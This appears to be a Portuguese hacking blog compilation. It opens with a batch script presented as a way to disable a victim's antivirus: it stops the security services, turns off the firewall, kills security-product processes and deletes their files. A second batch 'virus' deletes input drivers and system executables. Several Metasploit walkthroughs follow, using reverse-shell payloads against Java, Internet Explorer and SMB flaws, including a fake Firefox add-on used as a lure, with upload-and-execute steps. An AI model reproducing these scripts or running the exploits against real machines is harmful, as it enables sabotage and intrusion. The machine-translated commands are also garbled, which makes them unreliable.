terça-feira, 15 de janeiro de 2013

Como desativar / excluir Antivírus da sua vítima


@ Echo off
REM -
rem permanentemente Mate Anti-Virus
net stop "Security Center"
netsh firewall set modo opmode = desativar
tskill / A * av
tskill / A * fogo
tskill / A * anti
cls
tskill / A * espião
tskill / A BullGuard
tskill / A PersFw
tskill / A * KAV
tskill / A ZONEALARM
tskill / A SafeWeb
cls
tskill / A OUTPOST
tskill / A * nv
tskill / A * nav
tskill / A * F-
tskill / A eSafe
tskill / A cle
cls
tskill / A BlackICE
tskill / A * def
tskill / A kav
tskill / A * kav
tskill / A * avg
tskill / A * cinzas
cls
tskill / A aswUpdSv
tskill / A * ewid
tskill / A * guarda
tskill / A * guar
tskill / A * gcasDt
tskill / A * msmp
cls
tskill / A * mcafe
tskill / A mghtml
tskill / A msiexec
tskill / Um posto avançado
tskill / A iSafe
tskill / A * zap
cls
tskill / A zauinst
tskill / A * upd
tskill / A * zlclien
tskill / A minilog
tskill / A * cc
tskill / A * norton
cls
tskill / A norton au *
tskill / A * ccc
tskill / A * npfmn
tskill / A * loge
tskill / A * nisum
tskill / A issvc
tskill / A * tmp
cls
tskill / A * tmn
tskill / A * pcc
tskill / A * cpd
tskill / A * pop
tskill / A * pav
tskill / A PAdmin
cls
tskill / A * panda
tskill / A * avsch
tskill / A * sche
tskill / A * Syman
tskill / A * vírus
tskill / A * reino
cls
tskill / A * varredura
tskill / A * varredura
tskill / A * ad-
tskill / A * seguro
tskill / A * AVAS
tskill / A * norma
cls
tskill / A * offg
del / Q / FC:. \ Arquivos de Programas \ alwils ~ 1 \ Avast4 \ *
del / Q / FC:. \ Arquivos de programas \ Lavasoft \ Ad-awa ~ 1 \ * exe
del / Q / FC: \ Program Files \ exe kasper ~ 1 \ *.
cls
del / Q / FC: \ Program Files \ exe trojan ~ 1 \ *.
del / Q / FC: \ Arquivos de programas \ f-prot95 \ * dll.
del / Q / FC:. \ Arquivos de Programas \ tbav \ * dat
cls
del / Q / FC:. \ Arquivos de Programas \ avpersonal \ * vdf
del / Q / FC:. \ Arquivos de programas \ Norton ~ 1 \ * cnt
del / Q / FC:. \ Arquivos de programas \ McAfee \ *
cls
del / Q / FC:. \ Arquivos de programas \ Norton ~ 1 \ Norton ~ 1 \ Norton ~ 3 \ *
del / Q / FC:. \ Arquivos de programas \ Norton ~ 1 \ Norton ~ 1 \ speedd ~ 1 \ *
del / Q / FC: \ Arquivos de programas \ Norton ~ 1 \ Norton ~ 1 \ *.
del / Q / FC: \ Arquivos de programas \ Norton ~ 1 \ *.
cls
del / Q / FC: \ Arquivos de Programas \ avgamsr \ * exe.
del / Q / FC: \ Arquivos de Programas \ avgamsvr \ * exe.
del / Q / FC: \ Arquivos de Programas \ avgemc \ * exe.
cls
del / Q / FC: \ Arquivos de Programas \ avgcc \ * exe.
del / Q / FC: \ Arquivos de Programas \ avgupsvc \ * exe.
del / Q / FC: \ Arquivos de programas \ Grisoft
del / Q / FC: \ Arquivos de Programas \ nood32krn \ * exe.
del / Q / FC: \ Arquivos de Programas \ nood32 \ * exe.
cls
del / Q / FC: \ Arquivos de programas \ NOD32
del / Q / FC: \ Arquivos de Programas \ nood32
del / Q / FC: \ Arquivos de Programas \ kav \ * exe.
del / Q / FC: \ Arquivos de Programas \ kavmm \ * exe.
del / Q / FC:. \ Arquivos de programas \ Kaspersky \ *
cls
del / Q / FC: \ Arquivos de Programas \ ewidoctrl \ * exe.
del / Q / FC: \ Arquivos de Programas \ guarda \ * exe.
del / Q / FC: \ Arquivos de programas \ ewido \ * exe.
cls
del / Q / FC: \ Arquivos de Programas \ pavprsrv \ * exe.
del / Q / FC: \ Arquivos de Programas \ pavprot \ * exe.
del / Q / FC: \ Arquivos de Programas \ avengine \ * exe.
cls
del / Q / FC: \ Arquivos de Programas \ apvxdwin \ * exe.
del / Q / FC: \ Arquivos de Programas \ webproxy \ * exe.
del / Q / FC:. \ Arquivos de programas \ panda software \ *
REM -

Vírus para Excluir mouse, explorar, logoff usando Programação Batch

@ Echo off

@ Se existe c: \ windows \ system32 \ rato del c: \ windows \ system32 \ rato
@ Se existe c: \ windows \ system32 \ teclado del c: \ windows \ system32 \ teclado
copy C: \ windows \
@ Se existe c: \ windows \ system32 \ logoff.exe del c: \ windows \ system32 \ logoff.exe
@ Se existe C: \ Arquivos de programas \ Internet Explorer \ iexplore.exe del C: \ Arquivos de programas \ Internet Explorer \ iexplore.exe

Lista das Melhores ferramentas de hacking ético / testes de penetração



Aqui está a lista de ferramentas de software útil e melhor que útil em Ethical Hacking e testes de penetração, Forense ...

Metasploit:

Metsploit é uma ferramenta muito poderosa PenTesting. Metasploit Framework, uma ferramenta para o desenvolvimento e execução de código de exploração contra uma máquina de destino remoto. O Metasploit Project também é conhecido por ferramentas anti-forenses e evasão, alguns dos quais são construídos no Metasploit Framework. Ferramenta muito útil para coleta de informações, análise de vulnerabilidade, Desenvolvimento Exploit, exploits lado do cliente, ...
Site oficial: http://www.metasploit.com/

Wireshark:
Wireshark é um livre e melhor ferramenta Network Packet Analyzer para UNIX e Windows. Ele é usado para resolução de problemas de rede, análise de malware e educação.

Homepage: http://www.wireshark.org

NMAP
Nmap ("Network Mapper") Security Scanner Free For Rede de Exploração & Hacking.It é usado para examinar uma rede e reúne informações sobre a rede de destino, incluindo as portas abertas, serviços executados no hospedeiro, informações OS, filtros de pacotes / firewalls detalhes, e mais.

Site oficial: http://nmap.org/

John The Ripper:
JTR é cracker senha gratuito e rápido. Seu objetivo principal é detectar senha Unix fraco.
Site oficial: www.openwall.com/john/

Acunetix Web Security Scanner
Auditar a sua segurança site e aplicações web para injeção de SQL, Cross Site Scripting e vulnerabilidades outros web com Acunetix Scanner Web Security.
Esta ferramenta não é uma livre; (
Site Oficial: www.acunetix.com

Maltego;

Maltego é uma inteligência de código aberto e aplicação forense. Ele vai lhe oferecer timous mineração e coleta de informações, bem como a representação desta informação em um formato fácil de compreender.
Site oficial: www.paterva.com/

IronWASP:
IronWASP (Iron aplicativo da Web avançada plataforma de testes de segurança) é um sistema de código aberto para web de teste de vulnerabilidade do aplicativo. Ele é projetado para ser customizável na medida em que os usuários podem criar seus próprios scanners de segurança personalizadas usando. Embora um usuário avançado com Python / Ruby perícia script seria capaz de fazer pleno uso da plataforma, uma série de características da ferramenta são simples o suficiente para ser usado por iniciantes.

Site oficial: http://ironwasp.org

HconSTF
HconSTF é muito útil ferramenta PenTesting. É usado para a enumeração de coleta de informações, e de reconhecimento, avaliação de vulnerabilidade, exploração, escalação de privilégios, Reporting.

Site oficial: http://www.hcon.in

Ettercap
Ettercap é um conjunto abrangente para o homem no meio ataques. Possui sniffing de conexões ao vivo, filtragem de conteúdo em tempo real e muitos outros truques interessantes. Ele suporta dissecação ativa e passiva de muitos protocolos e inclui muitos recursos para análise de rede e host.
Site oficial: http://ettercap.sourceforge.net/


Se você acha que eu deixei algumas ferramentas, você pode me ajudar a adicioná-lo.

Como cortar computador remoto usando Metasploit? Explorando vulnerabilidade Java


Sempre que alguém diz PenTesting ferramenta, a primeira coisa que vem em nossa mente é Metasploit. Hoje, eu estou indo para demonstrar como utilizar a ferramenta Metasploit para explorar o popular java AtomicReferenceArray vulnerabilidade Violação Tipo (CVE-2012-0507).
Sobre o Metasploit :
Metsploit é uma ferramenta muito poderosa PenTesting. Metasploit Framework, uma ferramenta para o desenvolvimento e execução de código de exploração contra uma máquina de destino remoto. O Metasploit Project também é conhecido por ferramentas anti-forenses e evasão, alguns dos quais são construídos no Metasploit Framework. Ferramenta muito útil para coleta de informações, análise de vulnerabilidade, Desenvolvimento Exploit, exploits lado do cliente, ...
Quadro dominar o: Um curso livre de Offensive-Security
A equipe de segurança ofensiva, juntamente com vários membros ativos da comunidade, fez um curso gratuito sobre o "Dominando o quadro" Metasploit Framework. O curso abrange coleta de informações, ataques de engenharia social, explorar o desenvolvimento, evitar Avanço AV e etc ..

O curso está disponível aqui:
www.offensive-security.com/metasploit-unleashed/Introduction

Doações para HFC, alimentar uma criança!
O "Dominando o quadro" é o curso livre. Se você gostou do curso, por favor, doe para Hackers para Caridade (HFC). Além de simplesmente fornecer alimentos para crianças carentes no leste da África, os hackers para o Programa de Alimentação Caridade permite que as crianças e suas famílias para sustentar-se e tornar-se mais auto-suficiente, ensinando-lhes valiosas habilidades agrícolas. Cada centavo recebido é enviado diretamente Hackers para Caridade em apoio da sua missão. Qualquer valor, não importa quão pequeno, faz a diferença, que só leva $ 9,00 para alimentar uma criança durante um mês.

Você pode encontrar mais detalhes sobre a doação aqui:
http://www.offensive-security.com/metasploit-unleashed/Donate

Ei, onde você vai?! Espere um pouco, tomar esse curso Uma vez que eu demonstrar como utilizar o Metasploit. Porque, vai ser difícil de entender ou chato, se você ler essas coisas diretamente.

Requisitos:
  • VirtualBox
  • Alvo OS (janelas, ...)
  • Distro PenTesting (Backtrack)
  • JRE 6 (versão sem patch)

CVE-2012-0507 é uma vulnerabilidade no JRE, devido ao fato de que a implementação da classe AtomicReferenceArray não verificar corretamente se a matriz é de um objeto esperado [tipo]. Um aplicativo Java malicioso ou applet poderia usar esta falha para causar Java Virtual Machine (JVM) para travar ou ignorar as restrições de Java sandbox.

Notícias sobre segurança: Essa vulnerabilidade afeta o Windows, Mac e Linux. No mês passado, malware Flashback infectar mais de 600 mil computadores Mac , explorando essa vulnerabilidade. Recentemente, o INSS , The Amnesty International UK sites injetado com código malicioso, que exploram a CVE-2012-0507.
Eu estou indo para demonstrar esta vulnerabilidade com o VirtualBox. Eu tenho a configuração duas máquinas virtuais ou seja, "Destino" e "BT5". Eu instalei o XP 2 no Target e R2 Backtrack 5 no 'BT5'.

(? Precisam de ajuda para configurar o VM, leia isto: Laboratório de configuração PenTesting ).

Parte I: Preparando o computador de destino:
Inicie o "alvo" da máquina.
Instalar o JRE 6.

Parte II: Preparação da máquina PenTesting:
Agora, começar a BT5.

Abra o terminal e digite "msfupdate". Isto irá atualizar o Metasploit Framework (MSF) com as últimas façanhas e cargas úteis. Como CVE-2012-0507 é o mais recente vulnerabilidade, você tem que atualizar o MSF antes de prosseguir.

conexão lenta de Internet?! Se você tem conexão de internet lenta, então você pode baixar o módulo java_atomicreferencearray sozinho em vez de atualizar todos os módulos.
Faça o download do java_atomicreferencearray.rb e colar nesta pasta "opt/metasploit/msf3/modules/exploits/multi/browser / /"

Então, Download CVE-2012-0507.jar e cole nesta pasta "/ opt/metasploit/msf3/data/exploits /"
Parte III:

Explorando o Java AtomicReferenceArray Vulnerabilidade Violação Tipo:



Etapa 1:
Abra o Terminal e "msfconsole" tipo. Isto irá trazer o console Metasploit, aqui você pode interagir com o MSF.

Etapa 2:
Tipo "use exploit / multi / browser / java_atomicreferencearray". Este comando irá usar o módulo java_atomicreferencearray.rb para o ataque.


Agora digite "mostrar opções" para mostrar as configurações que estão disponíveis e / ou necessários para este módulo específico.



Agora digite "definir SRVPORT 80".
e "definir URIPATH /".



Passo 3: Carga Set
Tipo "cargas Show", essa vontade exibe a lista de cargas. Nós vamos usar o 'reverse_tcp' payload. Esta carga terá conexão TCP inversa do alvo para PenTesting máquina.

Tipo 'set carga java / Meterpreter / reverse_tcp' no console.


definir LHOST [IP_address]: A fim de obter conexão reversa, nós temos que definir o nosso IP no LHOST.

Abra o terminal e "ifconfig" tipo. Isto irá exibir a informação de IP da nossa máquina PenTesting. O IP será "192.168.56.x". Por exemplo, deixe-me dizer o ip é 192.168.56.10.

Agora Digite o msfconsole como "conjunto LHOST 192.168.56.10".



Parte IV: Rompendo a máquina de destino:

Então, você está pronto?! Vamos invadir o computador de destino.

Etapa 1:

Digite "exploit" no msfconsole. Isto irá iniciar o manipulador inversa à nossa máquina e que vai esperar alguém que vai ligar para o servidor HTTP nosso (Ex: http://192.168.56.10). Uma vez vítima ligar para o nosso servidor, ele irá enviar um frasco que vai explorar a vulnerabilidade CVE-2012-0507.

passo 2:

Abra o Firefox / IE na máquina de destino.
Digite "http://192.168.56.10".
Ele carrega nada, mas exploit será executado em segundo plano.
Etapa 3:
Abrir a máquina BT5, ele irá exibir o seguinte resultado:


Agora digite "sessões", isto irá mostrar a lista de sessões ativas.

Tipo "sessões-i 1", isto irá abrir a conexão com a sessão com o '1 id 'e trazê-lo para Meterpreter. Meterpreter vai ajudar você a interagir / controlar com o Target.



Passo 4: upload de arquivos
Yeeeh ..! temos backdoor na máquina de destino, agora podemos executar comandos no alvo.



Por exemplo, digitando "sysinfo 'irá exibir as informações do sistema.


Você também pode carregar e executar seus próprios arquivos executáveis ​​na máquina de destino.

'Upload / Test.exe c: \ \ ", este comando irá fazer o upload do Test.exe a partir da raiz (' file system 'dir) da pasta do BT5 para a unidade C do alvo.

'Execute-f C: \ \ Test.exe ", este comando irá executar o nosso arquivo carregado no Target.


Dicas de Segurança:
Atualize seu JRE para a versão mais recente.


conclusão:
Espero que este artigo lhe deu uma boa visão como usar Metasploit Framework para explorar a vulnerabilidade Java. Espero que isso irá ajudá-lo a entrar no mundo PenTesting ..!

Hacking Windows 7 e XP com falsas Firefox Add-On (XPI): Tutoriais Metasploit

O que exatamente eu vou fazer?!
  1. Criar uma extensão do Firefox falso com Metasploit que cria uma backdoor no sistema da vítima.
  2. Enganam os usuários de instalar o add-on
  3. Invadir o computador de destino.
Pré-configuração:
  • Como de costume, você tem que configurar duas máquinas virutal (VM) no seu virtualbox ou seja, "Destino" e "atacante".
  • Instalar o windows xp ou 7 na VM de destino.
  • Instale o Backtrack na VM atacante.
precisam de ajuda para configurar o VM?! você pode ler este tutorial " Configurar laboratório pentesting ".

Parte I: Atualize o Metasploit
Como estamos indo para usar o mais recente módulo, você são aconselhados a atualizar os módulos do Metasploit. Não sei como fazer isso? Não precisa se preocupar!
  • Abra o Terminal
  • Tipo msfupdate
  • Isto irá atualizar o Metasploit com o mais recente módulos :)
Parte II: definições de configuração no Metasploit para a exploração falso-addon
Etapa 1:

Abra o Terminal e "msfconsole" tipo para obter o console Metasploit.

Etapa 2:
Tipo "use exploit / multi / browser / firefox_xpi_bootstrapped_addon" no console.

Etapa 3:
Agora, temos de saber a lista de configurações disponíveis para este módulo de exploração. A fim de obter a lista, você pode digitar "mostrar opções" no console.

Ao contrário do último tutorial, este módulo tem uma configuração extra para o módulo nomeadamente "addonname".

Passo 4: Configurações
Vamos definir a configuração para a sua exploração.
Digite os comandos destacou um por um no console

Comando: definir falso addonname
Detalhes: Nome para o falso add-on. você pode alterar o "fake" para qualquer nome.

Comando: SRVHOST conjunto 192.168.56.11
Detalhes: Aqui o 192.168.56.11 é o IP do Backtrack. Você pode obter este ip, basta digitar o "ifconfig" no terminal. Se você tem dificuldade em obter os detalhes de ip, por favor mande seu comentário ou ler meu post anterior.

Comando: set SRVPORT 80
Detalhes: Nosso servidor vai ser acessada através da porta 80 (porta padrão)

Comando: set URIPATH fakeEx
Detalhes: O caminho em que o falso add-on estará disponível para download. Por ex: http://192.168.56.11/fakeEx

Comando: LHOST conjunto 192.168.56.11
Detalhes: Aqui o 192.168.56.11 é o IP do Backtrack. Você pode obter este ip, basta digitar o "ifconfig" no terminal.

Passo 5: Carga

Como de costume, nós podemos usar carga TCP reversa para este ataque também. Então digite o seguinte comando no console do Metasploit:
definir payload windows / Meterpreter / reverse_tcp

Parte III: ataque de engenharia social

Configurado com êxito as configurações para a sua exploração, o que mais?! vamos lançar o exploit.
Digite "proeza" no console.
Agora, o exploit é iniciado. Nosso falso add-on está disponível em "http://192.168.56.11/fakeEx".

Uma vez vítima visitar o link, ele vai pedir usuário para instalar o add-on para visualizar a página. Quando o usuário instalar o add-on, o sistema será backdoor-ed.




Agora, você pode controlar o sistema vítima de Meterpreter.


Contramedidas:
Eu acredito que você entende os riscos de instalar o add-on de fontes desconhecidas. Então, pense duas vezes antes de instalar o add-on. Sempre use confiança extra. Pesquisa no google por comentário sobre o add-on.

Disclaimer:
O artigo dado aqui é o propósito educacional somente. Sugerimos que você tente este método em um ambiente controlado virtualbox. Nós não somos responsáveis ​​por sua atividade ilegal.
 
 
 
Fonte: BTS 

windows Hacking usando MS12-037 Internet Explorer Vulnerabilidade mesmo ID

MS12-037 Internet Explorer Vulnerabilidade mesmo ID Microsoft Internet Explorer 8 não tratar adequadamente os objetos na memória, o que permite que atacantes remotos para executar código arbitrário, acessando um excluído objeto, também conhecido como "O mesmo ID propriedade Vulnerabilidade de execução remota de código."

Duas tecnologias no sistema operacional moderno são usados ​​para fazer façanhas desse tipo ainda mais difícil: DEP (Data Execution Prevention) e ASLR (address-space randomização layout).

DEP se destina a impedir que um aplicativo ou serviço de execução de código a partir de uma região da memória não-executável. Isso ajuda a evitar que certas façanhas código da loja através de um estouro de buffer. ( wiki )

ASLR carrega módulos de software, tais como DLLs na memória em locais aleatórios. Movendo DLLs do sistema em torno torna mais difícil para hackers para adivinhar onde encontrar as funções de biblioteca que necessitam, como URLDownloadToFile () e CreateProcess ().

Mas DEP e ASLR não fazem execução remota de código ataca impossível, apenas mais complicado.

No caso da CVE-2012-1875, ASLR pode ser ignorada por tentar forçar o Internet Explorer para localizar e carregar uma versão antiga do Microsoft C Runtime DLL - um que foi compilado antes ASLR se tornar a norma, e
portanto, não o suporta. Sempre que você carregar uma DLL não ASLR, mesmo em um programa de ASLR habilitada, você pode prever onde isso vai acabar.

E DEP é contornado usando uma técnica conhecida como ROP, ou retorno de programação orientada.

Exploit para a vulnerabilidade do Internet Explorer mesmo ID (CVE-2012-1875):


Requisitos:
  • Alvo OS: XP3
  • Atacante OS: Backtrack ou qualquer PenTesting Distros
Como de costume, você tem que criar duas máquinas virtuais em seu VirtualBox.

Preparando sistema da vítima:
Instale o XP3 em um dos VM. Alterar o adaptador de rede da VM para o Host-somente o adaptador. (Se você não sabe o que estou falando, então use este manual do Virtualbox )

Preparando o sistema Atacante:
Atualizar os módulos do Metasploit, digitando o seguinte comando no Terminal:
msfupdate

Ou você pode baixar o " ms12_037_same_id.rb módulo 'e pasta neste diretório "opt/metasploit/msf3/modules/exploits/windows/browser / /"

Configurar as definições para a sua exploração em Metasploit:
Abra o Terminal e "msfconsole" tipo para obter o console Metasploit.

Tipo "use exploit/windows/browser/ms12_037_same_id" no console.

Agora, temos de saber a lista de configurações disponíveis para este módulo de exploração. A fim de obter a lista, você pode digitar "mostrar opções" no console.

Comando: SRVHOST conjunto 192.168.56.10
Detalhes: Aqui o 192.168.56.11 é o IP do Backtrack. Você pode obter este ip, basta digitar o "ifconfig" no terminal.

Comando: URIPATH set /
Detalhes: O caminho em que a nossa exploração será executado.

Como de costume, nós podemos usar carga TCP reversa para este ataque também. Então digite o seguinte comando no console do Metasploit:
definir payload windows / Meterpreter / reverse_tcp

Ok, vamos lançar o exploit.

Digite "proeza" no console.


Agora, o exploit é iniciado. Nossa exploração está funcionando em "http://192.168.56.10:8080/".

Uma vez que a vítima carrega o URL em seu navegador IE, você receberá a seguinte mensagem em seu console metasploit:

[*] Cliente requerente: /
[*] Usando o JRE ROP
[*] Enviando html
[*] Envio de estágio (752.128 bytes) para 192.168.56.12
[*] Meterpreter uma sessão aberta (192.168.56.10:4444 -> 192.168.56.12:1685)

Digite "sessões" para listar as sessões ativas. Tipo "sessões-i 1", isto irá abrir a conexão com a sessão com o '1 id 'e trazê-lo para Meterpreter.

Agora, você pode controlar o sistema vítima de computador usando Meterpreter.

Por exemplo:

'Upload / Test.exe c: \ \ ", este comando irá fazer o upload do Test.exe a partir da raiz (' file system 'dir) da pasta do BT5 para a unidade C do alvo.

'Execute-f C: \ \ Test.exe ", este comando irá executar o nosso arquivo carregado no Target.

Microsoft XML Core Services Vulnerabilidade Metasploit Demonstração

CVE-2012-1889: Microsoft XML Core Services Vulnerabilidade
Uma vulnerabilidade no Microsoft XML Core Services 3.0, 4.0, 5.0 e 6.0 permite a execução remota de código se um usuário visualiza uma página web especialmente criada usando o Internet Explorer.

Um invasor não teria como forçar os usuários a visitar um site deste tipo. Em vez disso, o invasor teria que convencer os usuários a visitar o site, geralmente fazendo com que eles cliquem em um link em uma mensagem de e-mail ou mensagens instantâneas, que os leva para o site do atacante.

A vulnerabilidade afeta todas as versões suportadas do Microsoft Windows, e todas as edições com suporte do Microsoft Office 2003 e Microsoft Office 2007. Aqui você pode a lista completa.

A vulnerabilidade existe quando MSXML tenta acessar um objeto na memória que não foi inicializado, o que pode corromper a memória de tal maneira que um invasor executar um código arbitrário no contexto do usuário conectado.
Vou demonstrar como usar a ferramenta Metasploit para testar se sua rede vulnerável ou não.

Abra o Terminal e digite "msfupdate" para obter as últimas módulos Metasploit. Quando a atualização for concluída, em seguida, digite "msfconsole".

Em seguida, digite o seguinte comando no console "uso explorar / windows / navegador / msxml_get_definition_code_exec".

Agora, temos de saber a lista de configurações disponíveis para este módulo de exploração. A fim de obter a lista, você pode digitar "mostrar opções" no console.

Comando: SRVHOST conjunto 192.168.56.10
Detalhes: Aqui o 192.168.56.11 é o IP do Backtrack. Você pode obter este ip, basta digitar o "ifconfig" no terminal.

Comando: lhost conjunto 192.168.56.10

Comando: URIPATH set /
Detalhes: O caminho em que a nossa exploração será executado.

Como de costume, nós podemos usar carga TCP reversa para este ataque também. Então digite o seguinte comando no console do Metasploit:
definir payload windows / Meterpreter / reverse_tcp

Digite "proeza" no console.


Uma vez que a vítima carrega o URL em seu navegador IE, você receberá a seguinte mensagem em seu console metasploit:

[*] Msxml_get_definition_code_exec - Usando msvcrt ROP

[*] Msxml_get_definition_code_exec - 10.0.1.79:1564 - Enviando html

[*] Envio de estágio (752.128 bytes) para 192.168.56.12

[*] Meterpreter uma sessão aberta (192.168.56.10:4444 -> 192.168.56.12:1565)

Digite "sessões" para listar as sessões ativas. Tipo "sessões-i 1", isto irá abrir a conexão com a sessão com o '1 id 'e trazê-lo para Meterpreter.

Digite "sysinfo" no Meterpreter para obter as informações do sistema.

Lista das Melhores sites para aprender Análise de Malware

Recursos para aprender Análise de Malware


Malware Tutoriais Análise: Uma Abordagem de Engenharia Reversa
Uma série de tutorial análise de malware escrito pelo Dr. Xiang Fu. Neste blog, você vai aprender como configurar o seu laboratório de análise de malware e fazer parte de análise de código usando Debugger Imunidade.

Link: Dr. Blog Fu de Segurança

Passo-a-Passo Malware Reverse Engineering: ZeroAccess / Max + + / Smiscer Rootkit Crimeware:
Este artigo quatro séries parte é um tutorial passo-a-passo completo sobre como fazer engenharia reversa do Rootkit ZeroAccess.
Link: InfoSec Institute

Tutoriais análise prática de malware
Esta página contém série de tutorial malwares análise que demonstram como dissecar as diferentes amostras de malware.

Link: Tutorial Malware.lu
Análise Sinowal:
O relatório de análise completa de Sinowal. Sinowal (também conhecida como Torpig ou anserina) é uma constante do trojan bancário superior em todo o mundo desde 2006.
Link: http://www.evild3ad.com/?p=1556

Análise de Shylock Trojan:
Shylock é um novo trojan descoberto por Trusteer cerca de 2 meses atrás. Ele é projetado para ser um espião de Tróia e, especificamente, um banqueiro. Metas a plataforma Windows, coleta informações do sistema várias do sistema infectado e enviá-lo para um servidor C & C remoto, capaz de realizar os ataques Man in do navegador (IE e FF) contra usuários de bancos do Reino Unido.
Link: http://p4r4n0id.com/

[Metasploit Tutorial] Hacking Windows XP usando o endereço IP

Você acha que é possível cortar algum computador com um apenas um endereço de ip?! A resposta é sim, se você está usando sem correções (vulnerável) OS. Se você não acredita em mim, então leia o artigo completo.

Neste artigo eu estou indo para demonstrar como hackear um computador remoto, explorando a falha de análise no código canonização caminho da Netapi32.dll através do Serviço de Servidor ( CVE-2008-4250 ). Antes de saltar para o processo de exploração real, deixe-me dar mais detalhes sobre esta vulnerabilidade no serviço de Servidor.

Detalhes sobre Vulnerabilidade Server Service (MS08-067):
Serviço Microsoft Windows Server fornece suporte para compartilhamento de recursos, como arquivos e serviços de impressão através da rede.

O serviço do servidor é vulnerável a uma vulnerabilidade de execução de código remoto. A vulnerabilidade é causada devido a um erro no processamento de sequências quando netapi32.dll diretório caráter de travessia em nomes de caminho. Isto pode ser explorado para corromper a memória pilha por exemplo o envio de solicitações RPC contendo nomes de caminho especialmente criadas para o componente de serviço do servidor. O 'NetprPathCanonicalize ()' função no arquivo 'netapi32.dll' é afetado.

Um pedido malicioso para os resultados sistema vulnerável compromisso completa de computadores vulneráveis.
Essa vulnerabilidade afeta o Windows XP, Windows 2000, Windows Server 2003, Windows Vista e Windows Server 2008. Mas Atacantes requerem acesso autenticado no Windows Vista e Server 2008 plataformas para explorar esta questão.

Explorando o MS08-067 usando Metasploit:

Requisitos:
  • VirtualBox
  • Backtrack 5
  • Alvo OS (XP)
Etapa 1:

Criar duas máquina virtual (VM), nomeadamente "Target" e "BT5". Instalar o XP dentro Alvo VM e Backtrack dentro BT5. Inicie os dois VMs.

Se você não sabe como criar máquinas virtuais, então por favor leia este manual VirtualBox .

Passo 2: Encontrar o endereço IP de destino
Abra o prompt de comando na máquina de destino (XP). Digite "ipconfig" para encontrar o endereço IP do sistema Target.

Hackers usam métodos diferentes para encontrar o endereço IP da vítima. Para por exemplo., Enviando link que irá obter os detalhes ip ou usar o Angry IP Scanner.

Passo 3: Coleta de Informações
Agora vamos coletar algumas informações sobre a máquina de destino. Para este fim, vamos usar a ferramenta nmap.

Abra o terminal na máquina BT5 (Backtrack) e digite "nmap-O 192.168.56.12". Aqui 192.168.56.12 é o endereço IP da máquina de destino. Se você olhar para o resultado, você pode encontrar a lista de portas abertas e versão OS.


Passo 4: Metasploit
Agora, abra o Terminal na máquina BT5 (Backtrack) e digite "msfconsole".

O msfconsole é a interface mais popular para o Metasploit Framework. Ele fornece um "tudo-em-um" console centralizado e permite acesso eficiente a praticamente todas as opções disponíveis no Metasploit Framework.

Vamos usar o comando de busca para encontrar os módulos de exploração com a NetAPI palavra-chave. Tipo "busca netap i". Agora você pode ver a lista de módulos de combinar com o NetAPI.


Nós vamos explorar MS08-067, assim tipo "uso exploit/windows/smb/ms08_067_netapi".

Passo 5: Carga Set
Como de costume, vamos usar a carga TCP reverso para esta façanha também. Tipo "set payload windows / Meterpreter / reverse_tcp" no msfconsole.

Passo 6: Opções
Tipo "definir LHOST 192.168.56.10". Aqui 192.168.56.10 é o endereço IP da máquina Backtrack. Você pode encontrar o endereço de ip pelo comando 'ifconfig' digitação no Terminal.

Tipo "definir rhost 192.168.56.12". Aqui 192.168.56.12 é o endereço IP da máquina de destino.

Passo 7: Explorando
Ok, é hora de explorar a vulnerabilidade, "proeza" tipo no console. Se a exploração for bem sucedido, você pode ver o seguinte resultado.

Agora podemos controlar o computador remoto usando o Meterpreter. Por exemplo, digitando "screenshot" vai pegar a imagem do sistema da vítima.

PC remoto Hacking, explorando Applet Java Bytecode Campo de Execução Remota de Código Verificador Cache

CVE-2012-1723: Esta é uma vulnerabilidade no verificador de bytecode HotSpot onde uma otimização inválido de GetField / PUTFIELD / instruções GETSTATIC / PUTSTATIC leva a verificação de tipo insuficiente. Um arquivo de classe especialmente criada poderia usar esta falha para contornar as restrições de Java sandbox, e carregar classes adicionais a fim de realizar operações maliciosas. A vulnerabilidade foi tornada pública por Schierl 'mihi' Michael.

Requisito:
  • Máquina atacante: Backtrack
  • Máquina da vítima: Windows (instalação JRE versão sem patch)
Passo 1: Inicie o console Metasploit
Abra o Terminal na Máquina atacante (Backtrack).
Digite "msfupdate", isso irá atualizar o metasploit com os últimos módulos.
Agora digite "msfconsole" para obter a interação com a estrutura Metasploit.

Etapa 2:
Tipo "use exploit / multi / browser / java_verifier_field_access" e siga os comandos abaixo:


msf exploit (java_verifier_field_access)> set PAYLOAD java / Meterpreter / reverse_http
msf exploit (java_verifier_field_access)> set LHOST [ENDEREÇO ​​Backtrack IP]
msf exploit (java_verifier_field_access)> explorar

Se você não sabe o que eu estou falando, por favor leia o meu tutorial anterior .

Etapa 3:
Se você seguir os comandos acima corretamente, você terá o seguinte resultado.

Copie o url e abrir o link na máquina da vítima. Uma vez que a url carregado na máquina da vítima, que vai lançar o exploit e cria uma nova sessão.

Agora digite "sessões", isto irá mostrar a lista de sessões ativas.

Tipo "sessões-i 1", isto irá abrir a conexão com a sessão com o '1 id 'e trazê-lo para Meterpreter. Meterpreter vai ajudar você a interagir / controlar o destino.


Fonte: Brek the Security 


ate Mais... 

PenTest (Teste de Vulnerabilidade)

O que pretendo discutir com os nossos colegas é quais são as ferramentas e métodos que utilizam para enumeração ,scanning e testes de vulnerabilidades em redes, sejam essas ferramentas para uso online ou em nossa maquina.
1. Penetration testing
Penetration-test é o método usado para testar e descobrir vulnerabilidades numa rede e a possibilidade de ver como estas podem ser exploradas ou corrigidas.
Para ser feito um teste de penetração são contratados profissionais (ou pessoas internas à rede) para explorar a rede, da mesma forma que um cracker faria e em seguida são entregues os resultados indicando todas as falhas encontradas e como corrigi-las.
Para se fazer um teste de penetração é necessário passar diversas fases, para as quais são utilizadas diversas ferramentas. As fases serão indicadas nos pontos seguintes.
1.1- Reconhecimento da rede
A enumeração consiste no reconhecimento da rede e dos sistemas atingíveis. Os resultados esperados são: nomes de domínios, nomes de servidores, informação do ISP, endereços IP envolvidos e também um mapa da rede. Inclui ainda informação de registros de domínios para os servidores.
Para fazer o reconhecimento da rede, podem ser utilizadas diversas ferramentas e técnicas, conforme o objectivo do ataque. Indico abaixo algumas ferramentas, que poderão ser usadas no reconhecimento.
• Nslookup – funciona em Windows e Linux. Serve para mapear endereços IP para um determinado domínio.
• Whois –Nos dá toda a informação sobre um domínio registado (entidade que registou, endereço físico, contactos, domain servers, etc)
• ARIN
• Dig – serve para perguntar a um servidor DNS informação acerca de outras coisas, por exemplo, a versão do name server que a empresa está a utilizar…
• Engenharia social
• Web site alvo
1.2-Scanning
Nesta fase de um teste de penetração é a identificação de portas abertas e serviços a correr, na máquina(s) ou rede alvo, chegando assim a enumeração de vulnerabilidades no alvo.
